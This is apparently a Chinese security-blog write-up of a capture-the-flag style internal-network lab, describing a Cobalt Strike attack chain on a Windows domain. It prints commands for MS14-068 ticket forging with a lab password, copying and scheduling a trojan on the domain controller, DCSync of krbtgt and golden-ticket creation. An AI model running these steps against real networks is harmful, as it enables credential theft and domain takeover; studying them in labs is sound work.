freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

记一次内网靶场渗透测试(下)
2022-10-13 10:59:44
所属地 广东省

程序员写在文章前:

上周,我们讨论了如何使用MSF完成整个打靶过程。按照小星和大家的约定,这周我们将分享如何使用CS来进行打靶,并给大家提供黄金票据的利用方法。

准备工作

由于开端获取webshell前的操作是与利用MSF打靶的方法是一致的,在此不再重复。我们直接从获取websehll开始,查看当前主机192.168.0.3和10.10.10.150的两个网卡以及存在域环境。

image.png

cs打靶方式

1. 查看进程后发现当前主机暂未安装安全软件,因此后续也无需进行免杀操作,可以先上线cs。

image.png

2. 上线cs后扫描域内主机,发现主机10.10.10.149存活,且开启了445端口,但是目标机器不出网,暂时放弃利用永恒之蓝。

image.png

3.使用cs自带的功能dump hash和mimikatz以获取明文密码,可发现有一个域用户web的明文密码。


image.png

4.此处小星使用了用户web的账号密码,试图生成一个新的会话大师,但结果失败了。因此,小星使用ms14-068来提权到预控和执行下述命令以创建票据。

ms14-068.exe -u web@hackbox.com -s S-1-5-21-2005268815-658469957-1189185684-1103 -d 10.10.10.149 -p !@#Qwe456

image.png

5.使用KrbCredExport脚本文件,将.ccache文件转化为.kirbi 格式。

image.png

6.为票据导入之前是不可以访问dc的,导入票据后成功访问dc的标识如下所示。

kerberos_ticket_use

image.png

7.访问域控,利用定时任务上线cs。
7.1首先创建一个smb 连接器,因为smb属于正向连接,所以操作相对简单。


image.png


7.2 upload bind.exe  #上传木马到机器web上。

shell copy bind.exe \\dc\c$\bind.exe#将木马复制到dc上。


image.png

7.3shell net time \\dc#查看dc当前事件

shell at \\dc 16:52:32  c:/bind.exe  #创建定时任务


image.png

7.4 在beacon执行命令link使dc成功上线。

image.png

7.5成功导出dc的hash和明文密码,至此域控dc已经攻克下来。

image.png

黄金票据

黄金票据的原理网络上已有详细的说明,这里就不展开叙述了。要创建黄金票据,需要掌握以下信息:

1.要伪造的域用户

2.域名

3.域的SID值

4.krbtgt账号的哈希值或AES-256值

步骤:

1. 首先在dc上执行命令,导出krbtgt信息“dcsync hackbox.com hackbox\krbtgt”。


image.png

2.在机器web上制作黄金票据,填入所需条件即可。注意:制作之前是无法访问dc的。

image.png

3.制作后成功访问dc。

image.png

4.获取3个flag的值。

image.png

总结

小星通过此次使用cs打靶,再度拓宽了对靶场测试研究的深度,并进一步验证了黄金票据的使用方法。接下来,小星将着手探究如何利用dc的永恒之蓝,我们下期再会!

# 渗透测试 # 网络安全 # 网络安全技术 # 网络靶场 # 黄金票据
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录